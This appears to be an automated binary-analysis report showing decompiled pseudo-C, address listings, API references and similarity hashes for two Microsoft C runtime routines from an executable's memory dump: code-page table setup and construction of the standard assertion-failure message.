					E004214E2(_t191);
					_v40 = E00420EFE(0x180, 1);
					E004214E2(_t191);
					_v44 = E00420EFE(0x101, 1);
					E004214E2(_t191);
					_t255 = _t254 + 0x3c;
					if(_v48 == _t191 || _v32 == _t191) {
						L43:
						E004214E2(_v48);
						E004214E2(_v32);
						E004214E2(_v36);
						E004214E2(_v40);
						_t191 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t201 = _v44;
						if(_t201 == 0 || _v36 == _t191 || _v40 == _t191) {
							goto L43;
						} else {
							_t138 = _t191;
							do {
								 *((char*)(_t138 + _t201)) = _t138;
								_t138 = _t138 + 1;
							} while (_t138 < 0x100);
							if(GetCPInfo( *_t225,  &_v28) == 0) {
								goto L43;
							}
							_t141 = _v28;
							if(_t141 > 5) {
								goto L43;
							}
							_t142 = _t141 & 0x0000ffff;
							_v60 = _t142;
							if(_t142 <= 1) {
								L22:
								_v52 = _v44 + 1;
								_t145 = E0042A439(_t273, _t191,  *((intOrPtr*)(_t240 + 0xa8)), 0x100, _v44 + 1, 0xff, _v36 + 0x81, 0xff,  *_t225, _t191);
								_t255 = _t255 + 0x24;
								_t274 = _t145;
								if(_t145 == 0) {
									goto L43;
								}
								_t148 = E0042A439(_t274, _t191,  *((intOrPtr*)(_t240 + 0xa8)), 0x200, _v52, 0xff, _v40 + 0x81, 0xff,  *_t225, _t191);
								_t255 = _t255 + 0x24;
								_t275 = _t148;
								if(_t148 == 0) {
									goto L43;
								}
								_v76 = _v32 + 0x100;
								_t151 = E0042A148(_t275, _t191, 1, _v44, 0x100, _v32 + 0x100,  *_t225, _t191);
								_t255 = _t255 + 0x1c;
								if(_t151 == 0) {
									goto L43;
								}
								_t152 = _v32;
								_t205 = _t152 + 0xfe;
								 *_t205 = 0;
								_t220 = _v40;
								_v80 = _t205;
								_t206 = _v36;
								_t242 = _t206 + 0x80;
								 *((char*)(_t206 + 0x7f)) = _t191;
								 *((char*)(_t220 + 0x7f)) = _t191;
								 *_t242 = _t191;
								_v84 = _t242;
								_t243 = _t220 + 0x80;
								_v52 = _t243;
								 *_t243 = _t191;
								if(_v60 <= 1) {
									L39:
									_t207 = 0x3f;
									_push(0x1f);
									_t155 = memcpy(_v32, _v32 + 0x200, _t207 << 2);
									_push(0x1f);
									asm("movsw");
									memcpy(_t155, _t155 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t157 = memcpy(_t220, _t220 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t247 = _v56;
									if( *((intOrPtr*)(_t247 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t157 | 0xffffffff) == 0) {
											E004214E2( *((intOrPtr*)(_t247 + 0x90)) - 0xfe);
											E004214E2( *((intOrPtr*)(_t247 + 0x94)) - 0x80);
											E004214E2( *((intOrPtr*)(_t247 + 0x98)) - 0x80);
											E004214E2( *((intOrPtr*)(_t247 + 0x8c)));
										}
									}
									_t158 = _v48;
									 *_t158 = 1;
									 *((intOrPtr*)(_t247 + 0x8c)) = _t158;
									 *_t247 = _v76;
									 *((intOrPtr*)(_t247 + 0x90)) = _v80;
									 *((intOrPtr*)(_t247 + 0x94)) = _v84;
									 *((intOrPtr*)(_t247 + 0x98)) = _v52;
									 *(_t247 + 4) = _v60;
									L44:
									E004214E2(_v44);
									_t122 = _t191;
									goto L48;
								}
								if( *_t225 != 0xfde9) {
									_t237 =  &_v22;
									__eflags = _v22 - _t191;
									if(_v22 == _t191) {
										goto L39;
									}
									_t194 = _v32;
									while(1) {
										_t175 = _t237[1];
										__eflags = _t175;
										if(_t175 == 0) {
											break;
										}
										_t248 =  *_t237 & 0x000000ff;
										_v68 = _t248;
										__eflags = _t248 - (_t175 & 0x000000ff);
										if(_t248 > (_t175 & 0x000000ff)) {
											L37:
											_t237 =  &(_t237[2]);
											__eflags =  *_t237;
											if( *_t237 != 0) {
												continue;
											}
											break;
										}
										_v64 = _t206;
										_t178 = _t220 + 0x80 + _t248;
										_t214 = _t206 - _t220;
										__eflags = _t214;
										_t221 = _v68;
										_t249 = _t194 - 0xffffff00 + _t248 * 2;
										_v72 = _t178;
										_t196 = _t178;
										do {
											 *_t249 = 0x8000;
											_t249 = _t249 + 2;
											 *(_t196 + _t214) = _t221;
											 *_t196 = _t221;
											_t221 = _t221 + 1;
											_t196 =  &(_t196[0]);
											__eflags = _t221 - (_t237[1] & 0x000000ff);
										} while (_t221 <= (_t237[1] & 0x000000ff));
										_t220 = _v40;
										_t206 = _v36;
										_t194 = _v32;
										goto L37;
									}
									L38:
									_t191 = 0;
									goto L39;
								}
								_t197 = _v52;
								_t238 = _t152 + 0x284;
								_t215 = 0xc2;
								_t251 = _t206 - _t220;
								do {
									_t181 = _t197 + _t215;
									 *_t238 = 0x8000;
									 *((char*)(_t251 + _t181)) = _t215;
									_t238 = _t238 + 2;
									 *_t181 = _t215;
									_t215 = _t215 + 1;
								} while (_t215 < 0xf5);
								_t220 = _v40;
								goto L38;
							}
							_t273 =  *_t225 - 0xfde9;
							if( *_t225 != 0xfde9) {
								_t223 =  &_v22;
								__eflags = _v22 - _t191;
								if(__eflags == 0) {
									goto L22;
								}
								_t216 = _v44;
								while(1) {
									_t182 = _t223[1];
									__eflags = _t182;
									if(__eflags == 0) {
										break;
									}
									_t252 =  *_t223 & 0x000000ff;
									__eflags = _t252 - (_t182 & 0x000000ff);
									if(_t252 > (_t182 & 0x000000ff)) {
										L20:
										_t223 =  &(_t223[2]);
										__eflags =  *_t223 - _t191;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t252 + _t216)) = 0x20;
										_t252 = _t252 + 1;
										__eflags = _t252 - (_t223[1] & 0x000000ff);
									} while (_t252 <= (_t223[1] & 0x000000ff));
									goto L20;
								}
								_t240 = _v56;
								goto L22;
							}
							E00417660(_t225, _v44 - 0xffffff80, 0x20, 0x80);
							_t255 = _t255 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t225);
				_push(0x1004);
				_push(_t120);
				_push(0);
				_push( &_v92);
				_t189 = E00429F96(__edx);
				_t255 = _t254 + 0x14;
				if(_t189 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00420ac9
0x00420ad0
0x00420ad5
0x00420ad8
0x00420ada
0x00420add
0x00420ae0
0x00420ae3
0x00420ae9
0x00420aec
0x00420aef
0x00420af2
0x00420af7
0x00420eb8
0x00420eba
0x00420ebc
0x00420ebc
0x00420ebf
0x00420ec5
0x00420ec5
0x00420ec7
0x00420ecd
0x00420ed3
0x00420edd
0x00420ee7
0x00420eee
0x00420ef5
0x00420efd
0x00420efd
0x00420afe
0x00420b01
0x00420b06
0x00420b24
0x00420b2e
0x00420b31
0x00420b43
0x00420b46
0x00420b58
0x00420b5b
0x00420b6d
0x00420b70
0x00420b82
0x00420b85
0x00420b8a
0x00420b90
0x00420e7e
0x00420e81
0x00420e89
0x00420e91
0x00420e99
0x00420ea3
0x00420ea3
0x00000000
0x00420b9f
0x00420b9f
0x00420ba4
0x00000000
0x00420bbc
0x00420bbc
0x00420bbe
0x00420bbe
0x00420bc1
0x00420bc2
0x00420bd7
0x00000000
0x00000000
0x00420bdd
0x00420be3
0x00000000
0x00000000
0x00420be9
0x00420bec
0x00420bf2
0x00420c47
0x00420c6a
0x00420c6e
0x00420c73
0x00420c76
0x00420c78
0x00000000
0x00000000
0x00420ca0
0x00420ca5
0x00420ca8
0x00420caa
0x00000000
0x00000000
0x00420cc4
0x00420cca
0x00420ccf
0x00420cd4
0x00000000
0x00000000
0x00420cda
0x00420ce3
0x00420ce9
0x00420cec
0x00420cef
0x00420cf2
0x00420cf5
0x00420cfb
0x00420cfe
0x00420d01
0x00420d03
0x00420d06
0x00420d0c
0x00420d0f
0x00420d11
0x00420dbc
0x00420dc3
0x00420dc4
0x00420dcf
0x00420dd2
0x00420dd4
0x00420dde
0x00420de1
0x00420de3
0x00420dec
0x00420dee
0x00420df0
0x00420df1
0x00420dfc
0x00420e01
0x00420e05
0x00420e13
0x00420e26
0x00420e34
0x00420e3f
0x00420e44
0x00420e05
0x00420e47
0x00420e4a
0x00420e50
0x00420e59
0x00420e5e
0x00420e67
0x00420e70
0x00420e79
0x00420ea4
0x00420ea7
0x00420ead
0x00000000
0x00420eaf
0x00420d1d
0x00420d52
0x00420d55
0x00420d58
0x00000000
0x00000000
0x00420d5a
0x00420d5d
0x00420d5d
0x00420d60
0x00420d62
0x00000000
0x00000000
0x00420d64
0x00420d6a
0x00420d6d
0x00420d6f
0x00420db2
0x00420db2
0x00420db5
0x00420db8
0x00000000
0x00000000
0x00000000
0x00420db8
0x00420d77
0x00420d80
0x00420d82
0x00420d82
0x00420d84
0x00420d87
0x00420d8a
0x00420d8d
0x00420d8f
0x00420d94
0x00420d97
0x00420d9a
0x00420d9d
0x00420d9f
0x00420da4
0x00420da5
0x00420da5
0x00420da9
0x00420dac
0x00420daf
0x00000000
0x00420daf
0x00420dba
0x00420dba
0x00000000
0x00420dba
0x00420d1f
0x00420d22
0x00420d2a
0x00420d2f
0x00420d36
0x00420d36
0x00420d39
0x00420d3c
0x00420d3f
0x00420d42
0x00420d44
0x00420d45
0x00420d4d
0x00000000
0x00420d4d
0x00420bf4
0x00420bfa
0x00420c14
0x00420c17
0x00420c1a
0x00000000
0x00000000
0x00420c1c
0x00420c1f
0x00420c1f
0x00420c22
0x00420c24
0x00000000
0x00000000
0x00420c26
0x00420c2c
0x00420c2e
0x00420c3d
0x00420c3d
0x00420c40
0x00420c42
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00420c30
0x00420c30
0x00420c30
0x00420c34
0x00420c39
0x00420c39
0x00000000
0x00420c30
0x00420c44
0x00000000
0x00420c44
0x00420c0a
0x00420c0f
0x00000000
0x00420c0f
0x00420ba4
0x00420b90
0x00420b08
0x00420b09
0x00420b0e
0x00420b12
0x00420b13
0x00420b14
0x00420b19
0x00420b1e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

_free.LIBCMT ref: 00420B31

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 00420B46
_free.LIBCMT ref: 00420B5B
_free.LIBCMT ref: 00420B70
_free.LIBCMT ref: 00420B85
GetCPInfo.KERNEL32(?,?), ref: 00420BCF

Part of subcall function 0042A148: GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 0042A218
Part of subcall function 0042A148: __freea.LIBCMT ref: 0042A221

_free.LIBCMT ref: 00420E13
_free.LIBCMT ref: 00420E26
_free.LIBCMT ref: 00420E34
_free.LIBCMT ref: 00420E3F
_free.LIBCMT ref: 00420E81
_free.LIBCMT ref: 00420E89
_free.LIBCMT ref: 00420E91
_free.LIBCMT ref: 00420E99
_free.LIBCMT ref: 00420EA7

Part of subcall function 00429F96: _free.LIBCMT ref: 0042A001
Part of subcall function 00429F96: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0042A03C
Part of subcall function 00429F96: _free.LIBCMT ref: 0042A0AB

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorHeapLast$AllocateFeatureFreeInfoPresentProcessorStringType___raise_securityfailure__freea
String ID:
API String ID: 1350984463-0
Opcode ID: ffab674593df14e851ad1d693fbb7bf56a08586ef083488de42208593d6cbfef
Instruction ID: 53805f9266d0f8d595313455e41e70458910dc590d464f521e53f51f89f9f90d
Opcode Fuzzy Hash: ffab674593df14e851ad1d693fbb7bf56a08586ef083488de42208593d6cbfef
Instruction Fuzzy Hash: F2D19171A002159FDB20DFA9D881BEEBBF5FF18300F54456EE858A7352D778A881CB54

Uniqueness

Uniqueness Score: 12.89%

Function 00420AC1, Relevance: 22.8, APIs: 15, Instructions: 343COMMON

Download Yara Rule

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

_free.LIBCMT ref: 00420B31

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 00420B46
_free.LIBCMT ref: 00420B5B
_free.LIBCMT ref: 00420B70
_free.LIBCMT ref: 00420B85
GetCPInfo.KERNEL32(?,?), ref: 00420BCF

Part of subcall function 0042A148: GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 0042A218

_free.LIBCMT ref: 00420E13
_free.LIBCMT ref: 00420E26
_free.LIBCMT ref: 00420E34
_free.LIBCMT ref: 00420E3F
_free.LIBCMT ref: 00420E81
_free.LIBCMT ref: 00420E89
_free.LIBCMT ref: 00420E91
_free.LIBCMT ref: 00420E99
_free.LIBCMT ref: 00420EA7

Part of subcall function 00429F96: _free.LIBCMT ref: 0042A001
Part of subcall function 00429F96: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 0042A03C
Part of subcall function 00429F96: _free.LIBCMT ref: 0042A0AB

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorHeapLast$AllocateFreeInfoStringType
String ID:
API String ID: 242458404-0
Opcode ID: d1554b321bffe470d798861312ccd0cefaadfb90a2e58fdf6f9b08b846818eb1
Instruction ID: 53805f9266d0f8d595313455e41e70458910dc590d464f521e53f51f89f9f90d
Opcode Fuzzy Hash: d1554b321bffe470d798861312ccd0cefaadfb90a2e58fdf6f9b08b846818eb1
Instruction Fuzzy Hash: F2D19171A002159FDB20DFA9D881BEEBBF5FF18300F54456EE858A7352D778A881CB54

Uniqueness

Uniqueness Score: 12.89%

Function 0041F64F, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 404
UNIQUE

Download Yara Rule

C-Code - Quality: 72%

			E0041F64F(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, char* _a24) {
				char _v0;
				signed int _v8;
				char _v12;
				char _v16;
				char _v532;
				signed int _v536;
				signed int _v540;
				WCHAR* _v544;
				signed int _v548;
				intOrPtr* _v552;
				WCHAR* _v556;
				intOrPtr _v576;
				intOrPtr* _v580;
				intOrPtr* _v584;
				intOrPtr* _v588;
				intOrPtr* _v592;
				intOrPtr* _v596;
				void* __ebp;
				signed int _t93;
				void* _t97;
				void* _t101;
				signed int _t102;
				void* _t119;
				void* _t121;
				void* _t122;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr _t130;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t145;
				void* _t146;
				void* _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t159;
				void* _t160;
				signed int _t161;
				WCHAR* _t163;
				char* _t164;
				char* _t165;
				char* _t168;
				char* _t169;
				void* _t172;
				void* _t173;
				char* _t175;
				char* _t176;
				void* _t178;
				void* _t180;
				void* _t181;
				signed int _t183;
				void* _t184;
				void* _t185;
				void* _t187;
				signed int _t193;
				WCHAR* _t196;
				intOrPtr* _t197;
				signed int _t199;
				intOrPtr* _t201;
				intOrPtr* _t203;
				intOrPtr* _t206;
				void* _t210;
				void* _t214;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				char _t220;
				signed short* _t223;
				intOrPtr* _t225;
				signed int _t227;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t232;
				void* _t235;
				void* _t280;

				_t213 = __edx;
				_t93 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t93 ^ _t227;
				_t189 = _a24;
				_t225 = _a4;
				_t220 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t97 = E00421D09(_t225, _t220, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t231 = _t230 + 0xc;
				if(_t97 != 0) {
					L65:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0041A842();
					asm("int3");
					_push(_t227);
					_t228 = _t231;
					_push(_t196);
					_push(_t196);
					E0041FBDE(_t189, _t220, _t225, _v584, _v580, _v576);
					_t101 = E0041B5C1(2);
					_t232 = _t231 + 0x10;
					_t102 =  *(_t101 + 0xc);
					__eflags = _t102 & 0x000004c0;
					if((_t102 & 0x000004c0) == 0) {
						_push(0);
						_push(4);
						_t119 = E0041B5C1(2);
						_t196 = 0;
						_push(_t119);
						E0041C427();
						_t232 = _t232 + 0x10;
					}
					_push(0);
					_v12 = E0041FC8F();
					_v16 = E0041B5C1(2);
					_push( &_a8);
					_push( &_a4);
					_push( &_v0);
					L69();
					E0041BA53(_t196, E0041B5C1(2));
					E0042156A(_t189, _t196, _t213, _t225, _t280,  &_v16,  &_v12);
					asm("int3");
					_push(_t228);
					_push( *_v580);
					_push( *_v584);
					return E0041FD31( *_v596,  *_v592,  *_v588);
				} else {
					_t121 = E0042920C(_t225, _t220, L"\n\n");
					_t231 = _t231 + 0xc;
					if(_t121 != 0) {
						goto L65;
					} else {
						_t122 = E0042920C(_t225, _t220, L"Program: ");
						_t231 = _t231 + 0xc;
						if(_t122 != 0) {
							goto L65;
						} else {
							E00417660(_t220,  &_v532, _t122, 0x20a);
							_t235 = _t231 + 0xc;
							_v548 = 0;
							_t126 =  &_v548;
							__imp__GetModuleHandleExW(6, _t189, _t126);
							_t196 =  &_v532;
							_t189 = 0x105;
							asm("sbb eax, eax");
							_t128 =  ~_t126 & _v548;
							_v548 = _t128;
							if(GetModuleFileNameW(_t128, _t196, 0x105) != 0) {
								L5:
								_t189 =  &_v532;
								_t197 =  &_v532;
								_t213 = _t197 + 2;
								do {
									_t130 =  *_t197;
									_t197 = _t197 + 2;
								} while (_t130 != _v540);
								_t196 = _t197 - _t213 >> 1;
								if( &(_t196[5]) <= 0x40) {
									L9:
									_t132 = E0042920C(_t225, _t220, _t189);
									_t231 = _t235 + 0xc;
									if(_t132 != 0) {
										goto L65;
									} else {
										_t133 = E0042920C(_t225, _t220, "\n");
										_t231 = _t231 + 0xc;
										if(_t133 != 0) {
											goto L65;
										} else {
											_t134 = E0042920C(_t225, _t220, L"File: ");
											_t231 = _t231 + 0xc;
											if(_t134 != 0) {
												goto L65;
											} else {
												_t213 = _v536;
												_t199 = _t213;
												_t189 = _t199 + 2;
												do {
													_t135 =  *_t199;
													_t199 = _t199 + 2;
												} while (_t135 != _v540);
												_t196 = _t199 - _t189 >> 1;
												if( &(_t196[4]) <= 0x40) {
													_push(_t213);
													goto L34;
												} else {
													_t193 = _t213;
													_t210 = _t193 + 2;
													do {
														_t160 =  *_t193;
														_t193 = _t193 + 2;
													} while (_t160 != _v540);
													_v544 = 0x5c;
													_t189 = _t193 - _t210 >> 1;
													_t196 = 1;
													_t161 =  *(_t213 + _t189 * 2 - 2) & 0x0000ffff;
													if(_t161 != _v544) {
														_v556 = _t161;
														_t223 = _t213 - 2 + _t189 * 2;
														_t218 = _t161;
														while(_t218 != 0x2f && _t196 < _t189) {
															_t223 = _t223 - 2;
															_t196 =  &(_t196[0]);
															_t183 =  *_t223 & 0x0000ffff;
															_t218 = _t183;
															if(_t183 != _v544) {
																continue;
															}
															break;
														}
														_t220 = _a8;
														_t213 = _v536;
													}
													_t163 = _t189 - _t196;
													_v544 = _t163;
													if(_t163 <= 0x26) {
														L29:
														if(__eflags >= 0) {
															_push(0x23);
															_t164 = E0042936A(_t196, _t225, _t220, _t213);
															_t231 = _t231 + 0x10;
															__eflags = _t164;
															if(_t164 != 0) {
																goto L65;
															} else {
																_t165 = E0042920C(_t225, _t220, L"...");
																_t231 = _t231 + 0xc;
																__eflags = _t165;
																if(_t165 != 0) {
																	goto L65;
																} else {
																	_t196 = _v544;
																	_push(8);
																	_t168 = E0042936A(_t196, _t225, _t220, _v536 + _t196 * 2);
																	_t231 = _t231 + 0x10;
																	__eflags = _t168;
																	if(_t168 != 0) {
																		goto L65;
																	} else {
																		_t169 = E0042920C(_t225, _t220, L"...");
																		_t231 = _t231 + 0xc;
																		__eflags = _t169;
																		if(_t169 != 0) {
																			goto L65;
																		} else {
																			_t172 = _v536 + _t189 * 2 + 0xfffffff2;
																			goto L33;
																		}
																	}
																}
															}
														} else {
															_t173 = 0x35;
															_t196 = _t196 >> 1;
															_v556 = _t196;
															_push(_t173 - _t196);
															_t175 = E0042936A(_t196, _t225, _t220, _t213);
															_t231 = _t231 + 0x10;
															__eflags = _t175;
															if(_t175 != 0) {
																goto L65;
															} else {
																_t176 = E0042920C(_t225, _t220, L"...");
																_t231 = _t231 + 0xc;
																__eflags = _t176;
																if(_t176 != 0) {
																	goto L65;
																} else {
																	_t189 = _t189 - _v556;
																	__eflags = _t189;
																	_t172 = _v536 + _t189 * 2;
																	goto L33;
																}
															}
														}
													} else {
														if(_t196 >= 0x12) {
															__eflags = _t163 - 0x26;
															goto L29;
														} else {
															_t178 = 0x35;
															_push(_t178 - _t196);
															_t180 = E0042936A(_t196, _t225, _t220, _t213);
															_t231 = _t231 + 0x10;
															if(_t180 != 0) {
																goto L65;
															} else {
																_t181 = E0042920C(_t225, _t220, L"...");
																_t231 = _t231 + 0xc;
																if(_t181 != 0) {
																	goto L65;
																} else {
																	_t196 = _v544;
																	_t172 = _v536 + _t196 * 2;
																	L33:
																	_push(_t172);
																	L34:
																	_push(_t220);
																	_push(_t225);
																	_t137 = E0042920C();
																	_t231 = _t231 + 0xc;
																	if(_t137 != 0) {
																		goto L65;
																	} else {
																		_t138 = E0042920C(_t225, _t220, "\n");
																		_t231 = _t231 + 0xc;
																		if(_t138 != 0) {
																			goto L65;
																		} else {
																			_t139 = E0042920C(_t225, _t220, L"Line: ");
																			_t231 = _t231 + 0xc;
																			if(_t139 != 0) {
																				goto L65;
																			} else {
																				_t201 = _t225;
																				_t53 = _t201 + 2; // 0x1e0002
																				_t214 = _t53;
																				do {
																					_t140 =  *_t201;
																					_t201 = _t201 + 2;
																				} while (_t140 != 0);
																				_t215 = _t225;
																				_t196 = _t201 - _t214 >> 1;
																				_t54 = _t215 + 2; // 0x1e0002
																				_t189 = _t54;
																				do {
																					_t141 =  *_t215;
																					_t215 = _t215 + 2;
																				} while (_t141 != _v540);
																				_t213 = _t215 - _t189 >> 1;
																				_t145 = E00429198(_t196, _a20, _t225 + (_t215 - _t189 >> 1) * 2, _t220 - _t196, 0xa);
																				_t231 = _t231 + 0x10;
																				if(_t145 != 0) {
																					goto L65;
																				} else {
																					_t146 = E0042920C(_t225, _t220, L"\n\n");
																					_t231 = _t231 + 0xc;
																					if(_t146 != 0) {
																						goto L65;
																					} else {
																						_t147 = E0042920C(_t225, _t220, L"Expression: ");
																						_t231 = _t231 + 0xc;
																						if(_t147 != 0) {
																							goto L65;
																						} else {
																							_t203 = _t225;
																							_t59 = _t203 + 2; // 0x1e0002
																							_t217 = _t59;
																							do {
																								_t148 =  *_t203;
																								_t203 = _t203 + 2;
																							} while (_t148 != 0);
																							_t60 = (_t203 - _t217 >> 1) + 0xb0; // 0x1e00ae
																							_t213 = _t60;
																							_t206 = _v552;
																							_t189 = _t206 + 2;
																							do {
																								_t149 =  *_t206;
																								_t206 = _t206 + 2;
																							} while (_t149 != _v540);
																							_t196 = _t206 - _t189 >> 1;
																							if(_t196 + _t213 <= _t220) {
																								_push(_v552);
																								goto L51;
																							} else {
																								_push(_t220 - _t213 - 3);
																								_t159 = E0042936A(_t196, _t225, _t220, _v552);
																								_t231 = _t231 + 0x10;
																								if(_t159 != 0) {
																									goto L65;
																								} else {
																									_push(L"...");
																									L51:
																									_push(_t220);
																									_push(_t225);
																									_t151 = E0042920C();
																									_t231 = _t231 + 0xc;
																									if(_t151 != 0) {
																										goto L65;
																									} else {
																										_t189 = L"\n\n";
																										_t152 = E0042920C(_t225, _t220, L"\n\n");
																										_t231 = _t231 + 0xc;
																										if(_t152 != 0) {
																											goto L65;
																										} else {
																											_t153 = E0042920C(_t225, _t220, L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_t231 = _t231 + 0xc;
																											if(_t153 != 0) {
																												goto L65;
																											} else {
																												_t154 = E0042920C(_t225, _t220, L"\n\n");
																												_t231 = _t231 + 0xc;
																												if(_t154 != 0) {
																													goto L65;
																												} else {
																													_t155 = E0042920C(_t225, _t220, L"(Press Retry to debug the application - JIT must be enabled)");
																													_t231 = _t231 + 0xc;
																													if(_t155 != 0) {
																														goto L65;
																													} else {
																														E00415A87();
																														return _t155;
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t184 = _t196 * 2 - 0x6a;
									_t196 = 0x20a - _t184;
									_t189 =  &_v532 + _t184;
									_t185 = E0041FD4C( &_v532 + _t184, _t196, L"...", 6);
									_t231 = _t235 + 0x10;
									if(_t185 != 0) {
										goto L65;
									} else {
										goto L9;
									}
								}
							} else {
								_t187 = E00421D09( &_v532, 0x105, L"<program name unknown>");
								_t231 = _t235 + 0xc;
								if(_t187 != 0) {
									goto L65;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}

0x0041f64f
0x0041f65a
0x0041f661
0x0041f668
0x0041f66c
0x0041f670
0x0041f678
0x0041f683
0x0041f689
0x0041f68e
0x0041f695
0x0041f69a
0x0041fb25
0x0041fb27
0x0041fb28
0x0041fb29
0x0041fb2a
0x0041fb2b
0x0041fb2c
0x0041fb31
0x0041fb34
0x0041fb35
0x0041fb37
0x0041fb38
0x0041fb42
0x0041fb49
0x0041fb4e
0x0041fb51
0x0041fb55
0x0041fb5a
0x0041fb5c
0x0041fb5e
0x0041fb64
0x0041fb69
0x0041fb6a
0x0041fb6b
0x0041fb70
0x0041fb70
0x0041fb73
0x0041fb7c
0x0041fb84
0x0041fb8a
0x0041fb8e
0x0041fb92
0x0041fb9b
0x0041fba8
0x0041fbb0
0x0041fbb5
0x0041fbb8
0x0041fbbe
0x0041fbc3
0x0041fbdd
0x0041f6a0
0x0041f6a7
0x0041f6ac
0x0041f6b1
0x00000000
0x0041f6b7
0x0041f6be
0x0041f6c3
0x0041f6c8
0x00000000
0x0041f6ce
0x0041f6db
0x0041f6e0
0x0041f6e5
0x0041f6eb
0x0041f6f5
0x0041f6fd
0x0041f703
0x0041f709
0x0041f70b
0x0041f713
0x0041f721
0x0041f740
0x0041f740
0x0041f746
0x0041f748
0x0041f74b
0x0041f74b
0x0041f74e
0x0041f751
0x0041f75c
0x0041f764
0x0041f795
0x0041f798
0x0041f79d
0x0041f7a2
0x00000000
0x0041f7a8
0x0041f7af
0x0041f7b4
0x0041f7b9
0x00000000
0x0041f7bf
0x0041f7c6
0x0041f7cb
0x0041f7d0
0x00000000
0x0041f7d6
0x0041f7d6
0x0041f7dc
0x0041f7de
0x0041f7e1
0x0041f7e1
0x0041f7e4
0x0041f7e7
0x0041f7f2
0x0041f7fa
0x0041fb03
0x00000000
0x0041f800
0x0041f800
0x0041f802
0x0041f805
0x0041f805
0x0041f808
0x0041f80b
0x0041f816
0x0041f820
0x0041f824
0x0041f825
0x0041f831
0x0041f836
0x0041f83c
0x0041f83f
0x0041f841
0x0041f84b
0x0041f84e
0x0041f84f
0x0041f852
0x0041f85b
0x00000000
0x00000000
0x00000000
0x0041f85b
0x0041f85d
0x0041f860
0x0041f860
0x0041f868
0x0041f86a
0x0041f873
0x0041f8be
0x0041f8be
0x0041fa9b
0x0041faa0
0x0041faa5
0x0041faa8
0x0041faaa
0x00000000
0x0041faac
0x0041fab3
0x0041fab8
0x0041fabb
0x0041fabd
0x00000000
0x0041fabf
0x0041fabf
0x0041facb
0x0041fad3
0x0041fad8
0x0041fadb
0x0041fadd
0x00000000
0x0041fadf
0x0041fae6
0x0041faeb
0x0041faee
0x0041faf0
0x00000000
0x0041faf2
0x0041fafb
0x00000000
0x0041fafb
0x0041faf0
0x0041fadd
0x0041fabd
0x0041f8c4
0x0041f8c6
0x0041f8c7
0x0041f8cb
0x0041f8d1
0x0041f8d5
0x0041f8da
0x0041f8dd
0x0041f8df
0x00000000
0x0041f8e5
0x0041f8ec
0x0041f8f1
0x0041f8f4
0x0041f8f6
0x00000000
0x0041f8fc
0x0041f8fc
0x0041f8fc
0x0041f908
0x00000000
0x0041f908
0x0041f8f6
0x0041f8df
0x0041f875
0x0041f878
0x0041f8bb
0x00000000
0x0041f87a
0x0041f87c
0x0041f87f
0x0041f883
0x0041f888
0x0041f88d
0x00000000
0x0041f893
0x0041f89a
0x0041f89f
0x0041f8a4
0x00000000
0x0041f8aa
0x0041f8b0
